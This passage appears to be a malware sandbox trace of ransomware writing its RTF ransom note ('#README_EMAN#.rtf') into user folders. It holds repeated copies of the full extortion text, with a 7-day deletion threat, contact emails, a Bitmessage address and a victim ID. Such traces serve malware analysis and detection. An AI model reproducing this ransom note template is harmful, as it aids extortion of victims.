lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0285.190] WriteFile (in: hFile=0x294, lpBuffer=0x1f4d648*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4d648*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.191] CloseHandle (hObject=0x294) returned 1 [0285.204] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\#readme_eman#.rtf")) returned 0xffffffff [0285.204] GetLastError () returned 0x2 [0285.204] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 